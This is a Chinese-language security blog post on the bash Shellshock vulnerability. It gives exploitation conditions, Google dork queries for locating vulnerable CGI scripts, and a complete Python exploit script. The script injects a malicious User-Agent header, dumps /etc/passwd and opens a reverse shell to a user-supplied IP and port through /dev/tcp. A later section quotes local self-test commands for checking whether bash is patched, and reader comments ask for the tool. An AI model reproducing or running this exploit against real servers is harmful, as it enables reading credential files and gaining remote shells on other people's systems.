个人感觉利用方式肯定比HeartBleed简单快捷,只是脆弱点不好找,而且量肯定没OpenSSL多;而HeartBleed对很多VPN渗透很有帮助。
利用条件
1.env可控可写 2.派生bash子进程
Google搜索方式
filetype:sh inurl:cgi-bin filetype:cgi inurl:cgi-bin
http://www.exploit-db.com/exploits/34766/
php的工具可以稍微改动一下 也可以有回显 和反弹shell 当然也可以直接改cmd命令反弹
#!/usr/bin/env python
#-*- coding:utf8 -*-
import urllib,httplib
import re,urlparse
from ctypes import *
import sys
reload(sys)
sys.setdefaultencoding = 'utf-8'
def bash_exp(url):
hostname, urlpath = urlparse.urlsplit(url)[1:3]
try:
conn=httplib.HTTPConnection(hostname,timeout=20)
headers={"User-Agent":'() { :;}; /bin/bash -c "id"'}
conn.request("GET",urlpath,headers=headers)
res=conn.getresponse()
if res and res.status == 500:
windll.Kernel32.GetStdHandle.restype = c_ulong
h = windll.Kernel32.GetStdHandle(c_ulong(0xfffffff5))
windll.Kernel32.SetConsoleTextAttribute(h, 12)
print "SecPulse Hint:Bash of this site is Vulnerable!"
windll.Kernel32.SetConsoleTextAttribute(h, 7)
cat_passwd(hostname,urlpath)
windll.Kernel32.SetConsoleTextAttribute(h, 10)
reverseIp = raw_input("Reverse IP & Port Like 255.255.255.1/8080: ")
if reverseIp:
try:
conn2=httplib.HTTPConnection(hostname,timeout=20)
headers2={"User-Agent":'() { :;}; /bin/bash -i >& /dev/tcp/%s 0>&1' % reverseIp}
print "Reversing~"
conn2.request("GET",urlpath,headers=headers2)
except KeyboardInterrupt:
print "Process interrupted by user."
except Exception, e:
print e
else:
print "Nothing Input,Exiting..."
windll.Kernel32.SetConsoleTextAttribute(h, 7)
else:
print "SecPulse.com Hint:No Bash Vulnerable!"
except Exception, e:
print e
def cat_passwd(hostname,urlpath):
print "cat /etc/passwd :"
conn3=httplib.HTTPConnection(hostname,timeout=20)
headers3={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn3.request("GET",urlpath,headers=headers3)
res3=conn3.getresponse()
res=res3.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]
if __name__=='__main__':
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.secpulse.com/cgi-bin/index.cgi"
sys.exit(-1)
else:
bash_exp(sys.argv[1])
考虑危害性 就不放了
File Manager
Copyright 2003 Gamma Group
update bash
这个漏洞后期演变的很快 因为各种修复被绕过~~~老外的shellshocker.net蛮给力的列举出来了
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/*release* for your OS.
原创作者:安全脉搏
SP地址:http://www.secpulse.com/archives/917.html
本文作者:SmallFresh
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/917.html
必填 您当前尚未登录。 登录? 注册
必填(保密)正想求点这种神器什么的,呵呵 😛 😎
这个洞好快 演变的
我也想求这个神器。